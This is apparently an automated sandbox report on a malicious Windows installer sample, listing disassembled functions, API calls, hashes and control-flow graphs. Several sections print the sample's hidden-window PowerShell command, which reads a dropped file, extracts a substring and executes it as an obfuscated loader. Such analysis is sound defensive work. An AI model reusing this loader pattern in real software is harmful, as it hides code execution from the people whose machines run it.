                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                          • String ID: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"$C:\Users\user\AppData\Local\Temp\nst19C6.tmp$C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs$Exec
                                                                          • API String ID: 1941528284-789381947
                                                                          • Opcode ID: dcff8963308b2ca873f2611bd9013b816575dd23bb652e899ea40ceb27a2e8de
                                                                          • Instruction ID: a6908968e7e0a660026174725ff56955a6f1faca608fb57c98e9df4a9bbbb5a6
                                                                          • Opcode Fuzzy Hash: dcff8963308b2ca873f2611bd9013b816575dd23bb652e899ea40ceb27a2e8de
                                                                          • Instruction Fuzzy Hash: 5841D771904618BADB107BB5CC45DAF3A79EF42369F20833BF422B10E2C73C5A419A6D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 717 404e65-404e7a 718 404f30-404f34 717->718 719 404e80-404e92 717->719 720 404e94-404e98 call 405b9c 719->720 721 404e9d-404ea9 lstrlenA 719->721 720->721 723 404ec6-404eca 721->723 724 404eab-404ebb lstrlenA 721->724 726 404ed9-404edd 723->726 727 404ecc-404ed3 SetWindowTextA 723->727 724->718 725 404ebd-404ec1 lstrcatA 724->725 725->723 728 404f23-404f25 726->728 729 404edf-404f21 SendMessageA * 3 726->729 727->726 728->718 730 404f27-404f2a 728->730 729->728 730->718
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000,?), ref: 00404E9E
                                                                          • lstrlenA.KERNEL32(00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000), ref: 00404EAE
                                                                          • lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00402F9E,00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8), ref: 00404EC1
                                                                          • SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll), ref: 00404ED3
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EF9
                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F13
                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                          • String ID: Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll
                                                                          • API String ID: 2531174081-1391575251
                                                                          • Opcode ID: 1c6b95d35bddc95a7bbbacbe35564e314d7e1815686e0499ce86ad3b70f4f988
                                                                          • Instruction ID: f74adcbe277517a17f303532725ec1791e789a00cb50e63f9a7244524c8ab7df
                                                                          • Opcode Fuzzy Hash: 1c6b95d35bddc95a7bbbacbe35564e314d7e1815686e0499ce86ad3b70f4f988
                                                                          • Instruction Fuzzy Hash: A3219DB1900118BEDB119FA5DD849DFBFB9EF45354F14807AF504B6291C6389E40CBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 731 402e64-402e7a 732 402e83-402e8b 731->732 733 402e7c 731->733 734 402e94-402e99 732->734 735 402e8d 732->735 733->732 736 402ea9-402eb6 call 40306a 734->736 737 402e9b-402ea4 call 403080 734->737 735->734 741 403058 736->741 742 402ebc-402ec0 736->742 737->736 743 40305a-40305b 741->743 744 402ec6-402ee9 GetTickCount 742->744 745 402ff9-402ffb 742->745 748 403063-403067 743->748 749 403060 744->749 750 402eef 744->750 746 403045-403048 745->746 747 402ffd-403000 745->747 751 40304a 746->751 752 40304d-403056 call 40306a 746->752 747->749 753 403002 747->753 749->748 754 402ef4-402efc 750->754 751->752 752->741 765 40305d 752->765 758 403007-40300d 753->758 755 402f01-402f0a call 40306a 754->755 756 402efe 754->756 755->741 767 402f10-402f19 755->767 756->755 761 403012-40301b call 40306a 758->761 762 40300f 758->762 761->741 768 40301d-403030 WriteFile 761->768 762->761 765->749 769 402f1f-402f3f call 405f85 767->769 770 403032-403035 768->770 771 402ff5-402ff7 768->771 776 402ff1-402ff3 769->776 777 402f45-402f5c GetTickCount 769->777 770->771 773 403037-403041 770->773 771->743 773->758 775 403043 773->775 775->749 776->743 778 402fa1-402fa5 777->778 779 402f5e-402f66 777->779 782 402fe6-402fe9 778->782 783 402fa7-402faa 778->783 780 402f68-402f6c 779->780 781 402f6e-402f99 MulDiv wsprintfA call 404e65 779->781 780->778 780->781 790 402f9e 781->790 782->754 786 402fef 782->786 784 402fcc-402fd7 783->784 785 402fac-402fc0 WriteFile 783->785 789 402fda-402fde 784->789 785->771 788 402fc2-402fc5 785->788 786->749 788->771 791 402fc7-402fca 788->791 789->769 792 402fe4 789->792 790->778 791->789 792->749
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402EC6
                                                                          • GetTickCount.KERNEL32 ref: 00402F4D
                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F7A
                                                                          • wsprintfA.USER32 ref: 00402F8A
                                                                          • WriteFile.KERNELBASE(00000000,00000000,0078EAA8,7FFFFFFF,00000000), ref: 00402FB8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CountTick$FileWritewsprintf
                                                                          • String ID: ... %d%%
                                                                          • API String ID: 4209647438-2449383134
                                                                          • Opcode ID: 1ee8cdaf81abc5902e0f14ca360aedf438fec03b597b3cc6de573ba64b3f625c
                                                                          • Instruction ID: a1131f75f2d1942715029d12413e0120ad3f5e0bd8d3acfe7200d6871225b0cc
                                                                          • Opcode Fuzzy Hash: 1ee8cdaf81abc5902e0f14ca360aedf438fec03b597b3cc6de573ba64b3f625c
                                                                          • Instruction Fuzzy Hash: F4515A7190121AABCF10DF69DA48A9F7BB8BB04355F14413BF900B72C4C7789E50DBAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 793 401f68-401f74 794 401f7a-401f90 call 4029ff * 2 793->794 795 40202f-402031 793->795 805 401f92-401f9d GetModuleHandleA 794->805 806 401f9f-401fad LoadLibraryExA 794->806 797 40217e-402183 call 401423 795->797 802 402894-4028a3 797->802 803 402665-40266c 797->803 803->802 805->806 808 401faf-401fbc GetProcAddress 805->808 806->808 809 402028-40202a 806->809 811 401ffb-402000 call 404e65 808->811 812 401fbe-401fc4 808->812 809->797 816 402005-402008 811->816 814 401fc6-401fd2 call 401423 812->814 815 401fdd-401ff9 812->815 814->816 825 401fd4-401fdb 814->825 815->816 816->802 819 40200e-402016 call 4035a3 816->819 819->802 824 40201c-402023 FreeLibrary 819->824 824->802 825->816
                                                                          APIs
                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                                                            • Part of subcall function 00404E65: lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000,?), ref: 00404E9E
                                                                            • Part of subcall function 00404E65: lstrlenA.KERNEL32(00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000), ref: 00404EAE
                                                                            • Part of subcall function 00404E65: lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00402F9E,00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8), ref: 00404EC1
                                                                            • Part of subcall function 00404E65: SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll), ref: 00404ED3
                                                                            • Part of subcall function 00404E65: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EF9
                                                                            • Part of subcall function 00404E65: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F13
                                                                            • Part of subcall function 00404E65: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F21
                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                                          Strings
                                                                          • "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", xrefs: 00401FE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                          • String ID: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"
                                                                          • API String ID: 2987980305-3829023132
                                                                          • Opcode ID: 85308c4b588610a741ad742dead5d4bb3afdbee764a34200805a1c83be28a38f
                                                                          • Instruction ID: 69b9336aaa8ae6558f820ae1f090152185eb0d0d08fc7590899cf316edf80682
                                                                          • Opcode Fuzzy Hash: 85308c4b588610a741ad742dead5d4bb3afdbee764a34200805a1c83be28a38f
                                                                          • Instruction Fuzzy Hash: 7021EB72904215ABDF107FA4CE4DA6E79B0AB44358F24423BF611B62D0D7BC4942EA5E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 826 40231e-402364 call 402af4 call 4029ff * 2 RegCreateKeyExA 833 402894-4028a3 826->833 834 40236a-402372 826->834 836 402382-402385 834->836 837 402374-402381 call 4029ff lstrlenA 834->837 839 402395-402398 836->839 840 402387-402394 call 4029e2 836->840 837->836 844 4023a9-4023bd RegSetValueExA 839->844 845 40239a-4023a4 call 402e64 839->845 840->839 848 4023c2-402498 RegCloseKey 844->848 849 4023bf 844->849 845->844 848->833 849->848
                                                                          APIs
                                                                          • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040235C
                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst19C6.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040237C
                                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nst19C6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023B5
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nst19C6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402492
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateValuelstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nst19C6.tmp
                                                                          • API String ID: 1356686001-640197537
                                                                          • Opcode ID: 828ec97eb1749f7d0dccac40ba64abed5895ac499d5866b086c5794a3236b8a4
                                                                          • Instruction ID: d4937ef9b5a83c2972188be2a0d5841753625f31b596684550d6a8464bef8130
                                                                          • Opcode Fuzzy Hash: 828ec97eb1749f7d0dccac40ba64abed5895ac499d5866b086c5794a3236b8a4
                                                                          • Instruction Fuzzy Hash: 34117FB1E00118BFEB10EBA4DE8AEAF767CFB50358F10413AF905B61D1D6B85D41A668
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 851 4015b3-4015c6 call 4029ff call 4056a3 856 4015c8-4015e3 call 405635 CreateDirectoryA 851->856 857 40160a-40160d 851->857 864 401600-401608 856->864 865 4015e5-4015f0 GetLastError 856->865 859 401638-402183 call 401423 857->859 860 40160f-40162a call 401423 call 405b7a SetCurrentDirectoryA 857->860 872 402894-4028a3 859->872 873 402665-40266c 859->873 860->872 875 401630-401633 860->875 864->856 864->857 868 4015f2-4015fb GetFileAttributesA 865->868 869 4015fd 865->869 868->864 868->869 869->864 873->872 875->872
                                                                          APIs
                                                                            • Part of subcall function 004056A3: CharNextA.USER32(?,?,pivot\drukmaases.kin,?,0040570F,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004056B1
                                                                            • Part of subcall function 004056A3: CharNextA.USER32(00000000), ref: 004056B6
                                                                            • Part of subcall function 004056A3: CharNextA.USER32(00000000), ref: 004056CA
                                                                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs,00000000,00000000,000000F0), ref: 00401622
                                                                          Strings
                                                                          • C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs, xrefs: 00401617
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                          • String ID: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs
                                                                          • API String ID: 3751793516-2505418928
                                                                          • Opcode ID: 4885ffd880e05148dcf1fdd70a8cd6dc8aa3157c77afdd287b9ed92ee45deb14
                                                                          • Instruction ID: fe130fe747d7612bd359b5bee5f77481d56b475851a7b43d3d194bb92abb4f34
                                                                          • Opcode Fuzzy Hash: 4885ffd880e05148dcf1fdd70a8cd6dc8aa3157c77afdd287b9ed92ee45deb14
                                                                          • Instruction Fuzzy Hash: AF112531908150ABDB116F751D4496F37B0AA62366728073FF492B22E2C23C0942962E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 878 40583a-405844 879 405845-405870 GetTickCount GetTempFileNameA 878->879 880 405872-405874 879->880 881 40587f-405881 879->881 880->879 883 405876 880->883 882 405879-40587c 881->882 883->882
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 0040584E
                                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405868
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
